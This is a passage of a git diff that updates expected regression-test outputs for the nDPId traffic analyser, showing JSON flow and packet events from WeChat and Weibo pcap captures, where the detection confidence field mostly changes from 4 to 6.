IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167377896,"flow_last_seen":1492167468048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","packets-captured":1672,"packets-processed":1672,"total-skipped-flows":0,"total-l4-payload-len":561272,"total-not-detected-flows":0,"total-guessed-flows":25,"total-detected-flows":84,"total-detection-updates":67,"total-updates":5,"current-active-flows":0,"total-active-flows":109,"total-idle-flows":109,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":674,"global_ts_msec":1492171291761} +00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","packets-captured":1672,"packets-processed":1672,"total-skipped-flows":0,"total-l4-payload-len":561272,"total-not-detected-flows":0,"total-guessed-flows":25,"total-detected-flows":84,"total-detection-updates":65,"total-updates":5,"current-active-flows":0,"total-active-flows":109,"total-idle-flows":109,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":672,"global_ts_msec":1492171291761} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1672/1672 ~~ skipped flows.............: 0 @@ -680,9 +678,9 @@ ~~ total active/idle flows...: 109/109 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6273294 bytes -~~ total memory freed........: 6273294 bytes -~~ total allocations/frees...: 120783/120783 +~~ total memory allocated....: 6406928 bytes +~~ total memory freed........: 6406928 bytes +~~ total allocations/frees...: 123545/123545 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 450 chars ~~ json string max len.......: 2275 chars diff --git a/test/results/weibo.pcap.out b/test/results/weibo.pcap.out index 696144044..bd7b2fbfc 100644 --- a/test/results/weibo.pcap.out 
+++ b/test/results/weibo.pcap.out 
@@ -16,9 +16,9 @@ 00790{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1463089070756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1463089070756,"pkt":"kDVu60UQeJKcD6iOCABFAAEhMGVAAEARnDfAqAFp2DrS49GYAbsBDYkQDLva88\/LUhUgJkcz8vG4Z\/IO+VkPDhG6AFD7bU7A+qqkwZ+x\/RvFauDbIOOJtwCjXyUObeUIn5gQ+UX+x65qNOazAz\/4wVrPUNQeyvpM\/apVfaPKE\/BWwazlUXoAI5VQNixlUUJ1awnxsfIGiNrCTSIptZgAvLyXtwp5hhxDz3XyJujNKh8y4KxdXT+KUDUJOJJnUi42xAE7YEaRgCG0Gsvcv8KKqXj17ZhXhBURaPrZodsQJCbjs8pPzHSHwv2KhOv\/hmenV+Y+4AoEiGoPjQoanC+Mp48jh+wIc24blOr9i\/xboxYy\/SLPPtKSsAsklxNqe9J5gUDokozUo9KiuHi4kWMZ"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070757,"flow_last_seen":1463089070757,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1463089070757,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1463089070757,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1463089070757,"pkt":"kDVu60UQeJKcD6iOCABFAAA3JrZAAEARkEXAqAFpwKgBAdbMADUAI69dsmwBAAABAAAAAAAABXdlaWJvA2NvbQAAAQAB"} 
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070757,"flow_last_seen":1463089070757,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1463089070757,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070757,"flow_last_seen":1463089070757,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1463089070757,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1463089070841,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1463089070841,"pkt":"eJKcD6iOkDVu60UQCABFAABHAABAAEARtuvAqAEBwKgBaQA11swAM884smyBgAABAAEAAAAABXdlaWJvA2NvbQAAAQABwAwAAQABAAAAJAAEcoZQog=="} -00773{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070757,"flow_last_seen":1463089070841,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weibo.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"114.134.80.162"}} +00773{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070757,"flow_last_seen":1463089070841,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"weibo.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"114.134.80.162"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070841,"flow_last_seen":1463089070841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1463089070841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089070841,"pkt":"kDVu60UQeJKcD6iOCABFAAA8BZVAAEAGr+3AqAFpcoZQoubvAFC9RQISAAAAAKACchCiVgAAAgQFtAQCCAoAQQeHAAAAAAEDAwc="} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070841,"flow_last_seen":1463089070841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -30,21 +30,21 @@ 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1463089071094,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071094,"pkt":"eJKcD6iOkDVu60UQCABFAAA0QjAAADYG1XnYOtLOwKgBaQG7iVJFmCd++rIVGIAQCVwVnQAAAQEICm9c76IAQIN7"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1463089071195,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071195,"pkt":"eJKcD6iOkDVu60UQCABFAAA0BcYAACkGBsVyhlCiwKgBaQBQ5u8JOZF4vUUCE4ASOQhvgQAAAgQFqAEBBAIBAwMH"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1463089071195,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071195,"pkt":"kDVu60UQeJKcD6iOCABFAAAoBZZAAEAGsADAqAFpcoZQoubvAFC9RQITCTmReVAQAOXoagAA"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089070841,"flow_last_seen":1463089071196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1463089071196,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"weibo.com","url":"weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089070841,"flow_last_seen":1463089071196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1463089071196,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"weibo.com","url":"weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1463089071198,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071198,"pkt":"eJKcD6iOkDVu60UQCABFAAA0IcQAACoG6cZyhlCiwKgBaQBQ5vAZ6VqE6wTXzYASOQiSSgAAAgQFqAEBBAIBAwMH"} 
00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1463089071198,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071198,"pkt":"kDVu60UQeJKcD6iOCABFAAAo0ExAAEAG5UnAqAFpcoZQoubwAFDrBNfNGelahVAQAOULNAAA"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1463089071348,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071348,"pkt":"eJKcD6iOkDVu60UQCABFAAA0BccAACoGBcRyhlCiwKgBaQBQ5vFPiVnutrx1cIASOQjz5AAAAgQFqAEBBAIBAwMH"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1463089071348,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071348,"pkt":"kDVu60UQeJKcD6iOCABFAAAoct9AAEAGQrfAqAFpcoZQoubxAFC2vHVwT4lZ71AQAOVszgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071551,"flow_last_seen":1463089071551,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1463089071551,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1463089071551,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1463089071551,"pkt":"kDVu60UQeJKcD6iOCABFAAA7Jz9AAEARj7jAqAFpwKgBARvsADUAJ8YJ26oBAAABAAAAAAAAA3d3dwV3ZWlibwNjb20AAAEAAQ=="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071551,"flow_last_seen":1463089071551,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1463089071551,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"www.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071551,"flow_last_seen":1463089071551,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1463089071551,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": 
{"query":"www.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1463089071612,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1463089071612,"pkt":"eJKcD6iOkDVu60UQCABFAACAAABAAEARtrLAqAEBwKgBaQA1G+wAbIVL26qBgAABAAMAAAAAA3d3dwV3ZWlibwNjb20AAAEAAcAMAAUAAQAAACUAGQN3d3cFd2VpYm8DY29tBWNkbmdjA25ldADAKwABAAEAAAAHAARdvIaJwCsAAQABAAAABwAEXbyGhw=="} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":42,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071551,"flow_last_seen":1463089071612,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1463089071612,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"www.weibo.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.137"}} 
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":42,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071551,"flow_last_seen":1463089071612,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1463089071612,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"www.weibo.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.137"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071613,"flow_last_seen":1463089071613,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089071613,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1463089071613,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089071613,"pkt":"kDVu60UQeJKcD6iOCABFAAA84VFAAEAGsxPAqAFpXbyGicnyAFB0WekZAAAAAKACchD\/WQAAAgQFtAQCCAoAQQhIAAAAAAEDAwc="} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1463089071642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089071642,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGnGVdvIaJwKgBaQBQyfKlqmMtdFnpGqAS\/\/8RHAAAAgQFqAQCCAr5u121AEEISAEDAwc="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1463089071642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071642,"pkt":"kDVu60UQeJKcD6iOCABFAAA04VJAAEAGsxrAqAFpXbyGicnyAFB0WekapapjLoAQAOU+7wAAAQEICgBBCFD5u121"} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089071613,"flow_last_seen":1463089071642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1463089071642,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 
+00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089071613,"flow_last_seen":1463089071642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1463089071642,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071730,"flow_last_seen":1463089071730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089071730,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1463089071730,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071730,"pkt":"kDVu60UQeJKcD6iOCABFAAA08m9AAEAG2cLAqAFp2DrURZOqAbsjKGR2xs8noYAQA+RthAAAAQEICgBBCGYlk10U"} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1463089071755,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071755,"pkt":"eJKcD6iOkDVu60UQCABFAAA0StsAADYGy1fYOtRFwKgBaQG7k6rGzyehIyhkd4AQAsDqzAAAAQEICiWUDPAAQNxk"} 
@@ -53,14 +53,13 @@ 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072046,"flow_last_seen":1463089072046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089072046,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1463089072046,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072046,"pkt":"kDVu60UQeJKcD6iOCABFAAA0dEpAAEAGV+zAqAFp2DrUQYeLAbv4qaw1BowayYAQAO03NAAAAQEICgBBCLUlGFKF"} 